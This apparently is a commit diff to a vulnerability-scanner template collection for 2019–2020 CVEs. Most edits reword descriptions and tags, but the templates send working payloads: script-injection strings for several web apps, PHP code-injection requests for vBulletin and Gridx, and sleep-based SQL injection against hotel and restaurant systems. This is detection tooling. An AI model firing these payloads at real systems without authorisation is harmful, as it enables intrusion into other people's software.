description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
reference:
- https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
- http://dev.cmsmadesimple.org/project/files/729
@ -26,3 +26,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

10
cves/2019/CVE-2019-14223.yaml
View File

@ -1,14 +1,14 @@
id: CVE-2019-14223
info:
name: Alfresco Share Open Redirect
name: Alfresco Share - Open Redirect
author: pdteam
severity: medium
description: An issue was discovered in Alfresco Community Edition versions below 5.2.6, 6.0.N and 6.1.N. The Alfresco Share application is vulnerable to an Open Redirect attack via a crafted POST request. By manipulating
the POST parameters, an attacker can redirect a victim to a malicious website over any protocol the attacker desires (e.g.,http, https, ftp, smb, etc.).
description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D
- https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community
- https://nvd.nist.gov/vuln/detail/CVE-2019-14223
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -31,4 +31,6 @@ requests:
- type: regex
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"
# Enhanced by md on 2022/10/13

19
cves/2019/CVE-2019-14696.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-14696
info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross-Site Scripting
name: Open-School 3.0/Community Edition 2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter.
@ -15,7 +15,7 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14696
cwe-id: CWE-79
tags: packetstorm,cve,cve2019,xss
tags: xss,open-school,packetstorm,cve,cve2019
requests:
- method: GET
@ -24,12 +24,19 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- '<script>alert(document.domain)</script>'
part: body
# Enhanced by mp on 2022/08/08

17
cves/2019/CVE-2019-16759.yaml
View File

@ -15,7 +15,10 @@ info:
cvss-score: 9.8
cve-id: CVE-2019-16759
cwe-id: CWE-94
tags: rce,kev,seclists,cve,cve2019,vbulletin
metadata:
shodan-query: http.component:"vBulletin"
verified: "true"
tags: cve,cve2019,rce,kev,seclists,vbulletin
requests:
- raw:
@ -24,15 +27,15 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20md5%28%22CVE-2019-16759%22%29%3B
matchers-condition: and
matchers:
- type: word
words:
- "addcc9f9f2f40e2e6aca3079b73d9d17"
- type: status
status:
- 200
- type: word
words:
- "PHP Version"
# Enhanced by mp on 2022/03/29

15
cves/2019/CVE-2019-18957.yaml
View File

@ -1,21 +1,22 @@
id: CVE-2019-18957
info:
name: Microstrategy Library before 11.1.3 XSS
name: MicroStrategy Library <11.1.3 - Cross-Site Scripting
author: tess
severity: medium
description: |
Microstrategy Library in MicroStrategy before 2019 before 11.1.3 has reflected XSS.
MicroStrategy Library before 11.1.3 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18957
- https://www.cvedetails.com/cve/CVE-2019-18957/
- https://seclists.org/bugtraq/2019/Nov/23
- https://packetstormsecurity.com/files/155320/MicroStrategy-Library-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-18957
remediation: The issue can be resolved by downloading and installing 1.1.3, which has the patch.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-18957
cwe-id: CWE-79
tags: xss,seclists,cve,cve2019,microstrategy
tags: cve2019,microstrategy,packetstorm,xss,seclists,cve
requests:
- method: GET
@ -37,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/18

25
cves/2019/CVE-2019-19908.yaml
View File

@ -4,7 +4,8 @@ info:
name: phpMyChat-Plus 1.98 - Cross-Site Scripting
author: madrobot
severity: medium
description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
description: |
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
reference:
- https://cinzinga.github.io/CVE-2019-19908/
- http://ciprianmp.com/
@ -15,20 +16,30 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-19908
cwe-id: CWE-79
tags: cve,cve2019,xss,injection,javascript
metadata:
verified: true
google-dork: inurl:"/plus/pass_reset.php"
tags: cve,cve2019,phpMyChat,xss
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'username = "</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body
# Enhanced by mp on 2022/08/31

3
cves/2019/CVE-2019-2729.yaml
View File

@ -12,9 +12,10 @@ info:
- http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html
- http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-2729
cwe-id: CWE-284
tags: cve,cve2019,oracle,rce,weblogic
requests:

20
cves/2019/CVE-2019-3402.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2019-3402
info:
name: Jira <8.1.1 - Cross-Site Scripting
name: Jira < 8.1.1 - Cross-Site Scripting
author: pdteam
severity: medium
description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
description: |
Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
reference:
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
- https://jira.atlassian.com/browse/JRASERVER-69243
@ -15,6 +16,7 @@ info:
cve-id: CVE-2019-3402
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2019,atlassian,jira,xss
@ -25,12 +27,18 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'<script>alert(1)</script>' does not exist"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1)</script>"
part: body
# Enhanced by mp on 2022/08/31

7
cves/2019/CVE-2019-3912.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2019-3912
info:
name: LabKey Server < 18.3.0 - Open Redirect
name: LabKey Server Community Edition <18.3.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: An open redirect vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 via the /__r1/ returnURL parameter allows an unauthenticated remote attacker to redirect users to arbitrary web sites.
description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.tenable.com/security/research/tra-2019-03
- https://www.cvedetails.com/cve/CVE-2019-3912
- https://nvd.nist.gov/vuln/detail/CVE-2019-3912
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

7
cves/2019/CVE-2019-7275.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2019-7275
info:
name: Open Redirect in Optergy Proton/Enterprise BMS
name: Optergy Proton/Enterprise Building Management System - Open Redirect
author: 0x_Akoko
severity: medium
description: Optergy Proton/Enterprise devices allow Open Redirect.
description: Optergy Proton/Enterprise Building Management System contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
- https://applied-risk.com/resources/ar-2019-008
- https://cxsecurity.com/issue/WLB-2019110074
- https://applied-risk.com/labs/advisories
- https://nvd.nist.gov/vuln/detail/CVE-2019-7275
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -27,3 +28,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by md on 2022/10/13

7
cves/2019/CVE-2019-9915.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2019-9915
info:
name: GetSimpleCMS 3.3.13 - Open Redirection
name: GetSimple CMS 3.3.13 - Open Redirect
author: 0x_Akoko
severity: medium
description: GetSimpleCMS 3.3.13 has an Open Redirect via the admin/index.php redirect parameter.
description: GetSimple CMS 3.3.13 contains an open redirect vulnerability via the admin/index.php redirect parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://www.invicti.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms
- https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1300
- https://www.cvedetails.com/cve/CVE-2019-9915
- https://www.netsparker.com/web-applications-advisories/ns-18-056-open-redirection-vulnerability-in-getsimplecms/
- https://nvd.nist.gov/vuln/detail/CVE-2019-9915
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -33,3 +34,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

34
cves/2020/CVE-2020-13121.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2020-13121
info:
name: Submitty 20.04.01 - Open redirect
author: 0x_Akoko
severity: medium
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
reference:
- https://github.com/Submitty/Submitty/issues/5265
- https://www.cvedetails.com/cve/CVE-2020-13121
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2020-13121
cwe-id: CWE-601
tags: cve,cve2020,redirect,submitty,oos
requests:
- raw:
- |
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Referer: {{RootURL}}/authentication/login
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
cookie-reuse: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

7
cves/2020/CVE-2020-14181.yaml
View File

@ -21,13 +21,16 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/secure/ViewUserHover.jspa"
- '{{BaseURL}}/secure/ViewUserHover.jspa'
matchers-condition: and
matchers:
- type: word
words:
- "User does not exist"
- 'User does not exist'
- 'content="JIRA"'
condition: and
- type: status
status:
- 200

7
cves/2020/CVE-2020-15129.yaml
View File

@ -1,15 +1,16 @@
id: CVE-2020-15129
info:
name: Open-redirect in Traefik
name: Traefik - Open Redirect
author: dwisiswant0
severity: medium
description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios.
description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik
- https://github.com/containous/traefik/releases/tag/v2.2.8
- https://github.com/containous/traefik/pull/7109
- https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp
- https://nvd.nist.gov/vuln/detail/CVE-2020-15129
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.7
@ -35,3 +36,5 @@ requests:
part: body
words:
- "<a href=\"https://foo.nl/dashboard/\">Found</a>"
# Enhanced by md on 2022/10/13

10
cves/2020/CVE-2020-17526.yaml
View File

@ -1,20 +1,22 @@
id: CVE-2020-17526
info:
name: Apache Airflow < 1.10.14 - Authentication Bypass
name: Apache Airflow <1.10.14 - Authentication Bypass
author: piyushchhiroliya
severity: high
description: |
Incorrect Session Validation in Apache Airflow Webserver versions prior to 1.10.14 with default config allows a malicious airflow user on site A where they log in normally, to access unauthorized Airflow Webserver on Site B through the session from Site A.
Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
reference:
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
- http://www.openwall.com/lists/oss-security/2020/12/21/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
remediation: Change default value for [webserver] secret_key config.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
cve-id: CVE-2020-17526
cwe-id: CWE-287
metadata:
fofa-query: Apache Airflow
verified: "true"
@ -49,3 +51,5 @@ requests:
- "contains(body_1, 'Redirecting...')"
- "status_code_1 == 302"
condition: and
# Enhanced by md on 2022/10/19

7
cves/2020/CVE-2020-18268.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-18268
info:
name: Z-BlogPHP 1.5.2 - Open Redirect
name: Z-Blog <=1.5.2 - Open Redirect
author: 0x_Akoko
severity: medium
description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php."
description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/zblogcn/zblogphp/issues/216
- https://www.cvedetails.com/cve/CVE-2020-18268
- https://github.com/zblogcn/zblogphp/issues/209
- https://nvd.nist.gov/vuln/detail/CVE-2020-18268
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -37,3 +38,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/13

21
cves/2020/CVE-2020-19625.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
reference:
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
- https://github.com/oria/gridx/issues/433
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -19,23 +19,18 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "6ca86c2c17047c14437f55c42c801c10"
- type: status
status:
- 200
- type: word
words:
- "PHP Extension"
- "PHP Version"
condition: and
extractors:
- type: regex
part: body
group: 1
regex:
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
# Enhanced by mp on 2022/04/27

6
cves/2020/CVE-2020-20285.yaml
View File

@ -1,11 +1,11 @@
id: CVE-2020-20285
info:
name: zzcms - Reflected XSS
name: ZZcms - Cross-Site Scripting
author: edoardottt
severity: medium
description: |
There is a XSS in the user login page in zzcms 2019. Users can inject js code by the referer header via user/login.php
ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks.
reference:
- https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md
- https://nvd.nist.gov/vuln/detail/CVE-2020-20285
@ -41,3 +41,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/10/17

37
cves/2020/CVE-2020-21012.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2020-21012
info:
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
author: edoardottt
severity: critical
description: |
Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details.
reference:
- https://github.com/hitIer/web_test/tree/master/hotel
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-21012
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,hotel,sqli,unauth
requests:
- raw:
- |
POST /forgot_password.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
btn_forgot=1&email=1%27%20or%20sleep(6)%23
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "Hotel Booking System")'
condition: and

7
cves/2020/CVE-2020-22840.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-22840
info:
name: b2evolution CMS - Open Redirect
name: b2evolution CMS <6.11.6 - Open Redirect
author: geeknik
severity: medium
description: Open redirect vulnerability in b2evolution CMS version prior to 6.11.6 allows an attacker to perform malicious open redirects to an attacker controlled resource via redirect_to parameter in email_passthrough.php.
description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/b2evolution/b2evolution/issues/102
- http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html
- https://www.exploit-db.com/exploits/49554
- https://nvd.nist.gov/vuln/detail/CVE-2020-22840
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -26,3 +27,5 @@ requests:
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
# Enhanced by md on 2022/10/13

9
cves/2020/CVE-2020-23015.yaml
View File

@ -1,13 +1,14 @@
id: CVE-2020-23015
info:
name: OPNsense 20.1.5. Open Redirect
name: OPNsense <=20.1.5 - Open Redirect
author: 0x_Akoko
severity: medium
description: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter "url" in login page was not filtered and can redirect user to any website.
description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/opnsense/core/issues/4061
- https://www.cvedetails.com/cve/CVE-2020-23015
- https://nvd.nist.gov/vuln/detail/CVE-2020-23015
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -25,4 +26,6 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
# Enhanced by md on 2022/10/13

7
cves/2020/CVE-2020-24550.yaml
View File

@ -1,12 +1,13 @@
id: CVE-2020-24550
info:
name: EpiServer <13.2.7 - Open Redirect
name: EpiServer Find <13.2.7 - Open Redirect
author: dhiyaneshDK
severity: medium
description: An Open Redirect vulnerability in EpiServer Find before 13.2.7 allows an attacker to redirect users to untrusted websites via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL.
description: EpiServer Find before 13.2.7 contains an open redirect vulnerability via the _t_redirect parameter in a crafted URL, such as a /find_v2/_click URL. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://labs.nettitude.com/blog/cve-2020-24550-open-redirect-in-episerver-find/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24550
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
- type: status
status:
- 301
# Enhanced by md on 2022/10/13

46
cves/2020/CVE-2020-24902.yaml Normal file
View File

@ -0,0 +1,46 @@
id: CVE-2020-24902
info:
name: Quixplorer <=2.4.1 - Cross Site Scripting
author: edoardottt
severity: medium
description: |
Quixplorer <=2.4.1 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
reference:
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24902
cwe-id: CWE-79
metadata:
google-dork: intitle:"My Download Server"
shodan-query: http.title:"My Download Server"
verified: "true"
tags: cve,cve2020,quixplorer,xss
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>&srt=yes"
- "My Download"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

43
cves/2020/CVE-2020-24903.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2020-24903
info:
name: Cute Editor for ASP.NET 6.4 - Cross Site Scripting
author: edoardottt
severity: medium
description: |
Cute Editor for ASP.NET 6.4 is vulnerable to reflected cross-site scripting (XSS) caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.
reference:
- https://seclists.org/bugtraq/2016/Mar/104
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-24903
cwe-id: CWE-79
metadata:
shodan-query: http.component:"ASP.NET"
verified: "true"
tags: cve,cve2022,cuteeditor,xss,seclists
requests:
- method: GET
path:
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script></p>"
- "System.Web"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

43
cves/2020/CVE-2020-29284.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2020-29284
info:
name: Multi Restaurant Table Reservation System 1.0 - SQL Injection
author: edoardottt
severity: critical
description: |
The file view-chair-list.php in Multi Restaurant Table Reservation System 1.0 does not perform input validation on the table_id parameter which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
reference:
- https://www.exploit-db.com/exploits/48984
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29284
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve2020,tablereservation,sqli,unauth,edb,cve
requests:
- method: GET
path:
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=6'
- type: word
part: body
words:
- "Restaurent Tables"
- "Chair List"
condition: and
- type: status
status:
- 200

2
cves/2020/CVE-2020-35489.yaml
View File

@ -15,7 +15,7 @@ info:
cvss-score: 10
cve-id: CVE-2020-35489
cwe-id: CWE-434
tags: cve,cve2020,wordpress,wp-plugin,rce,upload,intrusive
tags: cve,cve2020,wordpress,wp-plugin,rce,fileupload,intrusive
requests:
- method: GET

7
cves/2020/CVE-2020-36365.yaml
View File

@ -1,14 +1,15 @@
id: CVE-2020-36365
info:
name: Smartstore < 4.1.0 - Open Redirect
name: Smartstore <4.1.0 - Open Redirect
author: 0x_Akoko
severity: medium
description: Smartstore (aka SmartStoreNET) before 4.1.0 allows CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit open redirect.
description: Smartstore (aka "SmartStoreNET") before 4.1.0 contains an open redirect vulnerability via CommonController.ClearCache, ClearDatabaseCache, RestartApplication, and ScheduleTaskController.Edit. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/smartstore/SmartStoreNET/issues/2113
- https://www.cvedetails.com/cve/CVE-2020-36365
- https://github.com/smartstore/SmartStoreNET
- https://nvd.nist.gov/vuln/detail/CVE-2020-36365
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -29,3 +30,5 @@ requests:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by md on 2022/10/14

23
cves/2020/CVE-2020-6308.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2020-6308
info:
name: Unauthenticated Blind SSRF in SAP
name: SAP - Unauthenticated Blind SSRF
author: madrobot
severity: medium
